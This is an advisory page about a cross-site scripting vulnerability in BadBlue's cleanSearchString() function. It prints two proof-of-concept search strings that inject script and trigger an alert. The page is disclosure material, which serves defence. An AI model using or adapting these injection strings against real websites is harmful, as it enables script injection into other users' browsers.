• info
• discussion
• exploit
• solution
• references

Working Resources BadBlue cleanSearchString() Cross Site Scripting Vulnerability

The following search strings will demonstrate this vulnerability:

"hi"'));alert("ZING!!!");document.write(cleanSearchString('a

"><script>alert("ZING!!!");</script><